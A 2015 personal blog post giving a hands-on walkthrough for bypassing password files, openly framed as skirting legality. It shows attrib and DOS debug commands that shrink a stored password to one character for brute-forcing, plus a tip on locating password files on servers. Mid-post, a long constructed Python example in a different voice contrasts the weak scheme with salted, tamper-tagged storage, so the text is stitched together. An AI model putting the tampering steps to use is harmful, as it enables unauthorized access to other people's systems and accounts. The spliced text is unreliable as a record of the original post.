Monday, December 21, 2015

Weekly technical blah - This week- Password acquisition

Ok, I'm going to sorta skirt really close to some legalities and morally questionable areas here, so if you're an upright citizen who is not curious about things then ignore this. Today I'm going to give you enough info to get started on the most basic of encryption hacks: password acquisition. Again, if you're upright.. well.. WTF are you doing here anyway? Otherwise, I'll need to explain a few things before going on:

- All systems, hardware and software, which use passwords need to store them somewhere in order to recognize them later. They will use this file to check against your entries when you enter a password in any given instance. You'd be surprised how often it's actually labeled "password.whatever.."
- This file WILL be stored locally (local to the system, whatever type it is).
- This file, or at least the password.. but generally the whole file.. will be encrypted. Often you can locate it by the very FACT it IS encrypted, when the other files at that point are startup ones and otherwise obvious standards.
- This encryption will generally be something you cannot read by looking at it. You won't be able to substitute letters for numbers or anything that simple.

However, here's a general technique that you can play with in getting started: look for something (again, stored locally) as BLAH.PSW, a 10 character string, or PASS.blah, etc. Make a backup copy first, then remove the archive and read-only attributes to gain write access to the file:


copy whatever.psw password.bak
attrib whatever.psw -a -r

(NOTE: again, if you know you'll know, and I know I'm making this hard, but Google is your friend AND IT'S NOT THAT HARD to see what I'm referring to. You'll need to know it anyway if you're going into this sphere.)


Now you can edit the password file using debug (if it's a DOS-level file) or another editor for other types; this example will go with the DOS-level type:


debug blah.psw
-d
OC4B:0100 85 8C 89 9A 8F 83 E9 E9-E9 E9 xx xx xx xx xx xx


The first six bytes in this example are the encrypted password, followed by padding (encrypted spaces) and the terminator. Use debug to change all but the first byte to match the padding. For example:


-e101 E9 E9 E9 E9 E9
-d100
OC4B:0100 85 E9 E9 E9 E9 E9 E9 E9-E9 E9 xx xx xx xx xx xx


Now write the edited file back to disk and quit debug:


-w
Writing 00012 bytes
-quit


Start the DOS-level (or whatever) program and try each letter of the alphabet in turn. It will throw you out after 3 invalid entries, so simply reload it and continue. In the worst case you will need to reload 8 times. As soon as you discover the new improved single-character password, you're in.
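Why the edit in the walkthrough above goes unnoticed, and what a password store that does not have this problem looks like, as an added Python example (my own constructed code, not the post's, and not taken from any real product). The XOR key, the 0xE9 pad byte, the 10-byte field, the sample password "TOPAZ" and the integrity key are all assumptions made for the demo:

```python
"""Constructed demo: a per-character password field of the kind the post
edits with debug, beside a salted-hash record with an integrity tag.

Every value below is an assumption for illustration only."""
import hashlib
import hmac
import os

FIELD_LEN = 10               # assumed fixed width of the stored password field
PAD_CIPHER = 0xE9            # the post shows 0xE9 as an "encrypted space"
XOR_KEY = PAD_CIPHER ^ 0x20  # constructed key chosen so that ' ' encodes to 0xE9

# --- weak scheme: every stored byte depends on exactly one character ---

def legacy_encode(password: str) -> bytes:
    """Space-pad to FIELD_LEN and XOR each byte with one constant key."""
    padded = password.ljust(FIELD_LEN)[:FIELD_LEN].encode("ascii")
    return bytes(b ^ XOR_KEY for b in padded)

def legacy_verify(stored: bytes, attempt: str) -> bool:
    """Compare the encoded attempt with the stored field byte for byte."""
    return hmac.compare_digest(stored, legacy_encode(attempt))

def legacy_effective_length(stored: bytes) -> int:
    """How many non-pad characters the stored field still demands.

    Because each byte is independent, overwriting bytes with the pad value
    shortens the secret the verifier will accept, and nothing ties the bytes
    together, so the edit is indistinguishable from a legitimately short
    password."""
    return len(stored.rstrip(bytes([PAD_CIPHER])))

# --- hardened scheme: salted slow hash plus a keyed integrity tag ---

SALT_LEN = 16
DIGEST_LEN = 32              # sha256 output
ITERATIONS = 100_000
# Assumed to live where whoever can write the password file cannot read it
# (an OS keystore, for instance); constructed here only to keep the demo offline.
INTEGRITY_KEY = b"constructed-demo-key-do-not-reuse"

def _tag(body: bytes) -> bytes:
    return hmac.new(INTEGRITY_KEY, body, "sha256").digest()

def hardened_store(password: str) -> bytes:
    """Record layout: salt | pbkdf2 digest | HMAC over (salt + digest)."""
    salt = os.urandom(SALT_LEN)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    body = salt + digest
    return body + _tag(body)

def record_is_intact(record: bytes) -> bool:
    """True only if no byte of salt or digest has been changed since storing."""
    body, tag = record[:SALT_LEN + DIGEST_LEN], record[SALT_LEN + DIGEST_LEN:]
    return hmac.compare_digest(tag, _tag(body))

def hardened_verify(record: bytes, attempt: str) -> bool:
    """Refuse an edited record outright; only then check the password.

    Even without the tag, an edited digest does not map to any short known
    password: the digest is a one-way function of the whole password and a
    random salt, not a byte-per-character encoding that can be trimmed."""
    if not record_is_intact(record):
        return False  # tampering detected: fail closed (and log it in real code)
    salt = record[:SALT_LEN]
    digest = record[SALT_LEN:SALT_LEN + DIGEST_LEN]
    candidate = hashlib.pbkdf2_hmac("sha256", attempt.encode("utf-8"), salt, ITERATIONS)
    return hmac.compare_digest(digest, candidate)

if __name__ == "__main__":
    stored = legacy_encode("TOPAZ")                              # constructed sample
    edited = stored[:1] + bytes([PAD_CIPHER]) * (FIELD_LEN - 1)  # the post's edit
    print("legacy field demands", legacy_effective_length(stored), "chars;",
          "after the edit it demands", legacy_effective_length(edited))
    rec = hardened_store("TOPAZ")
    damaged = bytearray(rec)
    damaged[SALT_LEN + 1] ^= 0xFF                                # flip one digest byte
    print("hardened record intact after edit?", record_is_intact(bytes(damaged)))
    print("hardened accepts real password on edited record?",
          hardened_verify(bytes(damaged), "TOPAZ"))
```

The 3-attempt lockout the post mentions fails for the same structural reason: its counter lives only in the running program, so a reload resets it. A counter kept in persistent storage and covered by the same integrity tag survives the reload, which is what turns "try each letter" from a few minutes of work into something an operator notices.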


Whee.
Learning.
Note: if trying on server files or a site, often it's as easy to locate the file or files as using the site name and adding a "/" (without the quotes) to the end, or index, etc. (again, simply google 'server file list' etc.. you'll have to do SOME of the work)
